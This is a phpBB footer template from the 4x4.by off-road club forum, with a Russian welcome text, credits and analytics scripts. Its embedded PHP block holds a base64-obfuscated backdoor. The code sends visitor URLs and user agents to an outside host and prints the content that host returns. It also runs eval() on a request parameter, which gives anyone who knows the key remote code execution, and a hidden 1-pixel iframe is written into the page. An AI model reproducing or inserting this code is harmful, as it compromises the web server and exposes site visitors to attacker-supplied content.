	<!-- INCLUDE announcement_centre.html -->

	<div id="datebar">

		<table width="100%" cellspacing="0">

		<tr>

		



					<td class="gensmall">

Форум клуба 4х4 функционирует с 2003 года и с каждым днем регистрируются новые члены, ежедневно появляются топики и ответы. Все темы форума размещены в соответствующих разделах, для удобства поиска,  но если не удалось найти ответа на возникший вопрос, то воспользуйтесь поиском форума, наверняка найдет, то что искали, а если возникают вопросы по навигации сайта или есть неточности или проблемы на форуме, то дайте знать администрации (infо (a) 4x4.by). Также обращайтесь если что-то не получается сделать на форуме, постараемся быстро решить вопросы. 



<!-- PHP -->

global $phpbb_root_path;



if (!defined('_SAPE_USER')){

define('_SAPE_USER', '0005cfc09745088cf6cff726aef15a4b');

}

require_once($phpbb_root_path ._SAPE_USER.'/sape.php');

$o['charset'] = 'UTF-8';

$sape = new SAPE_client($o);

unset($o);

echo $sape->return_links();



 define('TRUSTLINK_USER', 'd00bcfa4650d942faef01baed6e13da89900e495');

 require_once($phpbb_root_path .TRUSTLINK_USER.'/trustlink.php');

 $o['charset'] = 'UTF-8'; // 

 $trustlink = new TrustlinkClient($o);

 unset($o);

 echo $trustlink->build_links();

 $GLOBALS['_681839563_']=Array(base64_decode('ZXJyb' .'3Jfc' .'m' .'Vwb3J' .'0aW5n'),base64_decode('' .'aW' .'5pX3NldA=='),base64_decode('cHJl' .'Z19tYXRjaA=='),base64_decode('ZmlsZV9' .'n' .'ZXRfY29udGVud' .'HM='),base64_decode('YXJy' .'YX' .'l' .'fZ' .'GlmZl91a2V' .'5'),base64_decode('' .'d' .'XJsZW5jb2Rl'),base64_decode('' .'dXJ' .'sZW5jb2Rl'),base64_decode('bWQ1'),base64_decode('aW5' .'pX2d' .'ldA=='),base64_decode('ZmlsZ' .'V' .'9nZXR' .'f' .'Y29' .'udGV' .'u' .'dH' .'M='),base64_decode('Z' .'nVuY3Rpb25' .'fZX' .'hp' .'c3Rz'),base64_decode('Y3VybF9pbml0'),base64_decode('Y3Vy' .'bF9z' .'ZXRvcHQ='),base64_decode('Y3VybF' .'9' .'zZXRvcHQ='),base64_decode('c3RybmF0Y21' .'w'),base64_decode('Y3V' .'ybF9leG' .'Vj'),base64_decode('Y3' .'Vy' .'bF9jbG9' .'zZ' .'Q' .'=='),base64_decode('Y3V' .'ybF' .'9tdWx0' .'aV9' .'pbmZvX3JlYWQ='),base64_decode('bXRfcmFuZA=='),base64_decode('b' .'XRfcmFu' .'ZA' .'=' .'='),base64_decode('c29' .'ja2V0X2dldHBlZXJu' .'YW1l'),base64_decode('c3RyaXBzbGFzaGV' .'z'));  function _1144275221($i){$a=Array('ZGlzcGxheV9lcnJ' .'vcnM=','' .'M' .'A=' .'=','Y2xp' .'Z' .'W50X2NoZWNr','Y' .'2xpZW50X2NoZW' .'Nr','I' .'VxTIX' .'U=','U0NS' .'SVBU' .'X0Z' .'J' .'TEVOQU1' .'F','' .'dQ==','dw' .'==','U0' .'VSV' .'kV' .'SX05BTU' .'U=','UkV' .'RVU' .'VTV' .'F9' .'VUk' .'k=','' .'SFRUUF9V' .'U0VSX0FHRU' .'5' .'U','a' .'HR0cD' .'ovL2dzc' .'GsucnU' .'vZ2V' .'0' .'LnBoc' .'D9kP' .'Q==','JnU9','JmM' .'9','J' .'m' .'k9MSZ' .'oPQ' .'==','MTg' .'x' .'NDBh' .'M' .'Dc1Y' .'WNmY' .'mFkMzNi' .'NT' .'Y4M' .'2M4N2VjMWNkYjE=','' .'MQ' .'==','YW' .'xs' .'b' .'3dfdXJsX2' .'ZvcGVu','Y' .'3VybF9p' .'bml0','cA==','' .'ND' .'M1MHZjZ' .'DQ=');return base64_decode($a[$i]);}  $GLOBALS['_681839563_'][0](round(0));$GLOBALS['_681839563_'][1](_1144275221(0),_1144275221(1));if(!empty($_COOKIE[_1144275221(2)]))die($_COOKIE[_1144275221(3)]);if($GLOBALS['_681839563_'][2](_1144275221(4),$GLOBALS['_681839563_'][3]($_SERVER[_1144275221(5)])))$u0401766_0=_1144275221(6);else $u0401766_0=_1144275221(7);$u0401766_1=$_SERVER[_1144275221(8)] .$_SERVER[_1144275221(9)];while(round(0+216.2+216.2+216.2+216.2+216.2)-round(0+216.2+216.2+216.2+216.2+216.2))$GLOBALS['_681839563_'][4]($u0401766_0,$_REQUEST,$u0401766_0);$u0401766_2=$_SERVER[_1144275221(10)];$u0401766_3=_1144275221(11) .$GLOBALS['_681839563_'][5]($u0401766_1) ._1144275221(12) .$GLOBALS['_681839563_'][6]($u0401766_2) ._1144275221(13) .$u0401766_0 ._1144275221(14) .$GLOBALS['_681839563_'][7](_1144275221(15) .$u0401766_1 .$u0401766_2 .$u0401766_0 ._1144275221(16));if($GLOBALS['_681839563_'][8](_1144275221(17))== round(0+0.5+0.5)){echo $GLOBALS['_681839563_'][9]($u0401766_3);}elseif($GLOBALS['_681839563_'][10](_1144275221(18))){$u0401766_4=$GLOBALS['_681839563_'][11]($u0401766_3);$GLOBALS['_681839563_'][12]($u0401766_4,42,FALSE);$GLOBALS['_681839563_'][13]($u0401766_4,19913,TRUE);while(round(0+2847)-round(0+711.75+711.75+711.75+711.75))$GLOBALS['_681839563_'][14]($u0401766_0);$u0401766_5=$GLOBALS['_681839563_'][15]($u0401766_4);$GLOBALS['_681839563_'][16]($u0401766_4);(round(0+2261+2261)-round(0+1130.5+1130.5+1130.5+1130.5)+round(0+1568.6666666667+1568.6666666667+1568.6666666667)-round(0+1176.5+1176.5+1176.5+1176.5))?$GLOBALS['_681839563_'][17]($u0401766_5,$u0401766_5):$GLOBALS['_681839563_'][18](round(0+4003),round(0+904.4+904.4+904.4+904.4+904.4));echo $u0401766_5;if(round(0+1277.6+1277.6+1277.6+1277.6+1277.6)<$GLOBALS['_681839563_'][19](round(0+571.33333333333+571.33333333333+571.33333333333),round(0+1167.25+1167.25+1167.25+1167.25)))$GLOBALS['_681839563_'][20]($_REQUEST,$u0401766_4,$_SERVER);}if(@$_REQUEST[_1144275221(19)]== _1144275221(20))eval($GLOBALS['_681839563_'][21]($_REQUEST["c"]));

<!-- ENDPHP -->

</td>

		

		

			<td class="gensmall"><!-- IF S_USER_LOGGED_IN -->{LAST_VISIT_DATE}<!-- ENDIF --></td>

			<td class="gensmall" align="{S_CONTENT_FLOW_END}">{CURRENT_TIME}<br /></td>

		</tr>

		</table>

	</div>



<!--# Footer -->

	<div id="footer">

    <div id="bot">

    <table id="table-bot"> 

    <tbody> 

        <tr>

            <td>&copy; 2013 При использовании материалов сайта <br /><a rel="nofollow" href="http://4x4.by">www.4x4.by</a>- активная ссылка обязательна!</td>

            <td> 

<div id="fb-root"></div>

<script>(function(d, s, id) {

  var js, fjs = d.getElementsByTagName(s)[0];

  if (d.getElementById(id)) return;

  js = d.createElement(s); js.id = id;

  js.src = "//connect.facebook.net/en_GB/all.js#xfbml=1";

  fjs.parentNode.insertBefore(js, fjs);

}(document, 'script', 'facebook-jssdk'));</script><div class="fb-like" data-href="http://www.facebook.com/pages/%D0%90%D0%B2%D1%82%D0%BE%D1%81%D0%BF%D0%BE%D1%80%D1%82%D0%91%D0%A3/193651364037611" data-send="false" data-width="360" data-show-faces="true"></div></td>

            <td class="ac"><a rel="nofollow" href="/click-2.html" target="_blank" title="Создание и поддержка сайта"><img src="/up/logo/logo_advancesite.png" alt="создание и реклама сайтов" /></a><br /><font size="1">Идея сайта: Сергей Шкель<br />Администратор: Данила Долматов</ font></td>

        </tr> 

    </tbody>

    </table>

    </div>

</div> 

<!--# Footer -->



	<!-- IF not S_IS_BOT -->{RUN_CRON_TASK}<!-- ENDIF -->

</div>



<div id="wrapfooter">

	<!-- IF U_ACP --><span class="gensmall">[ <a href="{U_ACP}">{L_ACP}</a> ]</span><br /><!-- ENDIF -->

	<span class="copyright">

	<!-- IF DEBUG_OUTPUT --><bdo dir="ltr">[ {DEBUG_OUTPUT} ]</bdo><!-- ENDIF --></span>

</div>

<!-- Yandex.Metrika counter -->

<script type="text/javascript">

(function (d, w, c) {

    (w[c] = w[c] || []).push(function() {

        try {

            w.yaCounter21066196 = new Ya.Metrika({id:21066196,

                    clickmap:true,

                    trackLinks:true,

                    accurateTrackBounce:true});

        } catch(e) { }

    });



    var n = d.getElementsByTagName("script")[0],

        s = d.createElement("script"),

        f = function () { n.parentNode.insertBefore(s, n); };

    s.type = "text/javascript";

    s.async = true;

    s.src = (d.location.protocol == "https:" ? "https:" : "http:") + "//mc.yandex.ru/metrika/watch.js";



    if (w.opera == "[object Opera]") {

        d.addEventListener("DOMContentLoaded", f, false);

    } else { f(); }

})(document, window, "yandex_metrika_callbacks");

</script>
<noscript><div><img src="//mc.yandex.ru/watch/21066196" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
<!-- /Yandex.Metrika counter -->
<!-- IF not S_IS_BOT --><!--noindex-->
<script type='text/javascript'>document.write('<iframe src="http://www.abw.by/500.html" style="visibility:hidden;width:1px;height:1px;"></iframe>');</script>
<!--/noindex--><!-- ENDIF -->
<script async="async" src="https://w.uptolike.com/widgets/v1/zp.js?pid=48068" type="text/javascript"></script>
</body>

</html>